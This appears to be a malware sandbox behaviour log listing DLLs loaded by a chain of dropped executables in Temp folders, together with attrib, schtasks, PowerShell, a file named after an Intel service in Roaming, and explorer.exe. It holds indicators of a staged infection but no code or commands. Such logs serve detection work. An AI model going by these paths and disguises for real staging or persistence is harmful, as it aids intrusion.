Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mode.com	Section loaded: ulib.dll
Source: C:\Windows\System32\mode.com	Section loaded: ureg.dll
Source: C:\Windows\System32\mode.com	Section loaded: edgegdi.dll
Source: C:\Windows\System32\mode.com	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Section loaded: edgegdi.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: edgegdi.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
